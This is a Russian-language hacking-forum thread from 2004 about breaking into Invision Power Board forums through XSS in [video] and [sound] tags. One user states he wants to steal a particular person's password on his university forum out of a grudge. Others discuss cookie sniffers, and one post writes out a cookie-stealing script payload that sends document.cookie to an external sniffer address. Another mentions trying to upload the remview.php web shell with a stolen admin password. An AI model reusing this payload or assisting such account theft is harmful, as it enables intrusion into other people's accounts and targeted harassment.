Мне вот интерестно. На Вашем сайте, предоставлены тексты по взлому IPB форума, вот только не указывайте, про какую вверсию идёт речь. Или я может чего пропустил.
Так как на практике (вы уж извините. Новичек, который поставил свой форум и пробует, что к чему) тэги [video] не переходит в <embed> и соотвественно, теряет свой смысл как таковой.

Может я чего не допонял, но перепробовал разные варианты по этому поводу!

Заранее спасибо ®

Описываемые в статьях теги [video], [sound] и тд присутствуют в русифицированных версиях IPB, например в "Русский Модифицированный IPB v1.3 Final"

Хотів перевірити ці "уязвімості" на одгому IPB форумі, а там взагалі немає тегів [video] i [sound] Лише , [url], [email]... Версія форуму 2.0.0 (Тріал) Підкажіть, будь-ласка, шо робити [img]http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif

жека, хлопiц, я нихуi нe понял, о чем ты http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ октября 10 2004,16:38)</td></tr><tr><td id="QUOTE">жека, хлопiц, я нихуi нe понял, о чем ты http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif[/QUOTE]<span id='postcolor'>
Ой... А я думал у Вас по-нашему понимают. Тогда сорри, буду по-вашему http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif . В-общем, ситуация такая:
Надо попустить одного &quot;товарища&quot; на форуме нашего универа. Физически это сделать не представляется возможным (тип выехал из Киева в Австрию). Я не понимаю, почему его не банят, но уверен, что на мои просьбы админ этого не сделает. По этому не лишним было бы пи..донуть его пароль. Ближе к делу:
я в программировании и прочих делах не шарю пока вообще, по-этому слепо действовал по инструции. Так вот выяснилось, что на нашем форуме таких функций, как вставка [video] нет... Есть [img], [url], [email]. Это я что-то не так понял, или акое действительно бывает? Вот адресс (http://server2.hostsila.net/~bonet/bb/). Буду очень признателен, если поможешь разобраться http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

Хмм ... По-моему, тут xss не пройдет нигде &nbsp;...

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ октября 10 2004,17:53)</td></tr><tr><td id="QUOTE">Хмм ... По-моему, тут xss не пройдет нигде ...[/QUOTE]<span id='postcolor'>
Это значит, что через сниффер (или как там оно называется?) ничего взять не получиться?

Только ип и реферер ... Но они врядли что-нибудь &nbsp;дадут ...

А еще какие-то методы есть? Пускай даже самые нереальные?

Кстати, а что будет, если просто тупо выложить на форуме сцылку на сниффер, и кто-то по ней клацнет?

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (жека @ октября 10 2004,18:58)</td></tr><tr><td id="QUOTE">Кстати, а что будет, если просто тупо выложить на форуме сцылку на сниффер, и кто-то по ней клацнет?[/QUOTE]<span id='postcolor'>
Так ты куки не сможешь получить. А именно они то и нужны...
Но ваще-то форум ломается... Но как - не скажу...ищи сам ))

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ октября 10 2004,20:09)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (жека @ октября 10 2004,18:58)</td></tr><tr><td id="QUOTE">Кстати, а что будет, если просто тупо выложить на форуме сцылку на сниффер, и кто-то по ней клацнет?[/QUOTE]<span id='postcolor'>
Так ты куки не сможешь получить. А именно они то и нужны...
Но ваще-то форум ломается... Но как - не скажу...ищи сам ))[/QUOTE]<span id='postcolor'>
Ну скажи! http://forum.antichat.ru/iB_html/non-cgi/emoticons/rolleyes.gif Я ж ламер, сам не догадаюсь... Я еще толком не въехал, что такое эти &quot;куки&quot; http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif Помоги, будь человеком http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (жека @ октября 11 2004,00:06)</td></tr><tr><td id="QUOTE">Ну скажи! http://forum.antichat.ru/iB_html/non-cgi/emoticons/rolleyes.gif Я ж ламер, сам не догадаюсь... Я еще толком не въехал, что такое эти &quot;куки&quot; http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif[/QUOTE]<span id='postcolor'>
Вот именно поэтому и не скажу, иначе ты так и останешся ламером...

Algol, зря ты так ... Дело не в этом - скажу или не скажу ...

Ну, мужики, помогите! У меня просто времени нет учиться єтому http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif Учеба, работа...

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ октября 11 2004,12:05)</td></tr><tr><td id="QUOTE">Вот именно поэтому и не скажу, иначе ты так и останешся ламером...[/QUOTE]<span id='postcolor'>
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Вот именно поэтому и не скажу, иначе ты так и останешся ламером...[/QUOTE]<span id='postcolor'>
ну хотя бы намекни тогда...в каком направление копать надо...

В том же направлении, в котором и описано в статьях про IPB )

А на примере конкретном можите показать как взламывать ???? http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif

Какие-то злые они... http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif Открыли форум, а простым смертным помогать не хотят.

уязвимость содержится в пакете Invision Power Board версии 2.0
http://www.rootlab.ru/news.php?view=295

zFailure &nbsp;а ты понял в чем уязвимость...?

может я тупой...но я ничего не понял...

2 Егорыч+++
честно говоря
пока еще не собирался! http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif

значит , получил я пас админа , патыююсь , через смайлы залить remview.php &nbsp;, но запись запрещена , остаётся потделать &nbsp;html запрос , но я никак не поня как его потделать , раскажите подробней

Опишите пожалуйста что есть снифеер и с чем его едят? &nbsp;http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif Нигде толком не сказано http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif

Да, у меня тоже по снифферам вопрос.В руководстве по взлому IPB написан какой-то bla-bla-bla.cgi? Его так и надо указать или надо указать адрес сниффера, который выложен здесь. Народ, помоготе плз.Срочно!!!

Headhunter, нужно вписать или тот, который на античате, или свой.
Как сделать свой, стучи в асю...

То есть получается, что то самое сообщение, которое нужно посать выглядит так:
http://1.ru e=`` style=display:none;background:url(javascript:docum ent.images[12].src=&quot;http://http://antichat.ru/cgi-bin/s.jpg?&quot;+document.cookie) Lol
Или как-то по-другому?
А в referer тогда нужно указать адрес форума или что?
Помогите плз, очень нужно!!!

Не плохо бы было к статье по взлому добавить способы защиты, бывает очень полезно.